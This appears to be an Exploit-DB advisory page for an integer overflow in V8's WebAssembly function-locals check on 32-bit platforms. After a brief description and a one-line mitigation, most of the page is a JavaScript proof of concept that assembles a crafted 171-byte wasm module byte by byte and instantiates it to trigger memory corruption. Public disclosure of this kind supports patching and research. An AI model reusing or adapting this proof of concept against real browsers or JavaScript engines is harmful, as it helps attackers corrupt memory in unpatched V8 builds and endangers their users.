V8 Integer Overflow Vulnerability

vendor:

N/A

by:

Anonymous

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

V8 Integer Overflow Vulnerability

When v8 decodes the locals of a function, it performs a check to ensure that the number of function locals is not too large. On a 32-bit platform, this check can be bypassed due to an integer overflow, which can lead to memory corruption when the locals are allocated. A PoC is attached.

Mitigation:

Ensure that the number of function locals is not too large.

Source

Exploit-DB raw data:

/*
When v8 decodes the locals of a function, it performs a check:

if ((count + type_list->size()) > kV8MaxWasmFunctionLocals) {
        decoder->error(decoder->pc() - 1, "local count too large");
        return false;
      }

On a 32-bit platform, this check can be bypassed due to an integer overflow. This allows the number of function locals to be large, and can lead to memory corruption when the locals are allocated.

A PoC is attached. 
*/

var b2 = new Uint8Array( 171);
b2[0] = 0x0;
b2[1] = 0x61;
b2[2] = 0x73;
b2[3] = 0x6d;
b2[4] = 0x1;
b2[5] = 0x0;
b2[6] = 0x0;
b2[7] = 0x0;
b2[8] = 0x1;
b2[9] = 0xe;
b2[10] = 0x3;
b2[11] = 0x60;
b2[12] = 0x1;
b2[13] = 0x7f;
b2[14] = 0x0;
b2[15] = 0x60;
b2[16] = 0x0;
b2[17] = 0x0;
b2[18] = 0x60;
b2[19] = 0x2;
b2[20] = 0x7f;
b2[21] = 0x7f;
b2[22] = 0x1;
b2[23] = 0x7f;
b2[24] = 0x2;
b2[25] = 0x23;
b2[26] = 0x2;
b2[27] = 0x2;
b2[28] = 0x6a;
b2[29] = 0x73;
b2[30] = 0x3;
b2[31] = 0x6d;
b2[32] = 0x65;
b2[33] = 0x6d;
b2[34] = 0x2;
b2[35] = 0x0;
b2[36] = 0x1;
b2[37] = 0x7;
b2[38] = 0x69;
b2[39] = 0x6d;
b2[40] = 0x70;
b2[41] = 0x6f;
b2[42] = 0x72;
b2[43] = 0x74;
b2[44] = 0x73;
b2[45] = 0xd;
b2[46] = 0x69;
b2[47] = 0x6d;
b2[48] = 0x70;
b2[49] = 0x6f;
b2[50] = 0x72;
b2[51] = 0x74;
b2[52] = 0x65;
b2[53] = 0x64;
b2[54] = 0x5f;
b2[55] = 0x66;
b2[56] = 0x75;
b2[57] = 0x6e;
b2[58] = 0x63;
b2[59] = 0x0;
b2[60] = 0x0;
b2[61] = 0x3;
b2[62] = 0x3;
b2[63] = 0x2;
b2[64] = 0x1;
b2[65] = 0x2;
b2[66] = 0x7;
b2[67] = 0x1e;
b2[68] = 0x2;
b2[69] = 0xd;
b2[70] = 0x65;
b2[71] = 0x78;
b2[72] = 0x70;
b2[73] = 0x6f;
b2[74] = 0x72;
b2[75] = 0x74;
b2[76] = 0x65;
b2[77] = 0x64;
b2[78] = 0x5f;
b2[79] = 0x66;
b2[80] = 0x75;
b2[81] = 0x6e;
b2[82] = 0x63;
b2[83] = 0x0;
b2[84] = 0x1;
b2[85] = 0xa;
b2[86] = 0x61;
b2[87] = 0x63;
b2[88] = 0x63;
b2[89] = 0x75;
b2[90] = 0x6d;
b2[91] = 0x75;
b2[92] = 0x6c;
b2[93] = 0x61;
b2[94] = 0x74;
b2[95] = 0x65;
b2[96] = 0x0;
b2[97] = 0x2;
b2[98] = 0xa;
b2[99] = 0x47;
b2[100] = 0x2;
b2[101] = 0x6;
b2[102] = 0x0;
b2[103] = 0x41;
b2[104] = 0x2a;
b2[105] = 0x10;
b2[106] = 0x0;
b2[107] = 0xb;
b2[108] = 0x3e;
b2[109] = 0x1;
b2[110] = 0xff;
b2[111] = 0xff;
b2[112] = 0xff;
b2[113] = 0xff;
b2[114] = 0x0f;
b2[115] = 0x7f;
b2[116] = 0x20;
b2[117] = 0x0;
b2[118] = 0x20;
b2[119] = 0x1;
b2[120] = 0x41;
b2[121] = 0x4;
b2[122] = 0x6c;
b2[123] = 0x6a;
b2[124] = 0x21;
b2[125] = 0x2;
b2[126] = 0x2;
b2[127] = 0x40;
b2[128] = 0x3;
b2[129] = 0x40;
b2[130] = 0x20;
b2[131] = 0x0;
b2[132] = 0x20;
b2[133] = 0x2;
b2[134] = 0x46;
b2[135] = 0xd;
b2[136] = 0x1;
b2[137] = 0x41;
b2[138] = 0x2a;
b2[139] = 0x10;
b2[140] = 0x0;
b2[141] = 0x20;
b2[142] = 0x3;
b2[143] = 0x41;
b2[144] = 0xc4;
b2[145] = 0x0;
b2[146] = 0x20;
b2[147] = 0x0;
b2[148] = 0x36;
b2[149] = 0x2;
b2[150] = 0x0;
b2[151] = 0x41;
b2[152] = 0xc4;
b2[153] = 0x0;
b2[154] = 0x6a;
b2[155] = 0x21;
b2[156] = 0x3;
b2[157] = 0x20;
b2[158] = 0x0;
b2[159] = 0x41;
b2[160] = 0x4;
b2[161] = 0x6a;
b2[162] = 0x21;
b2[163] = 0x0;
b2[164] = 0xc;
b2[165] = 0x0;
b2[166] = 0xb;
b2[167] = 0xb;
b2[168] = 0x20;
b2[169] = 0x3;
b2[170] = 0xb;

function f(){print("in f");}
var memory = new WebAssembly.Memory({initial:1, maximum:1});
var mod = new WebAssembly.Module(b2);
var i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}});
i.exports.accumulate.call(0, 5);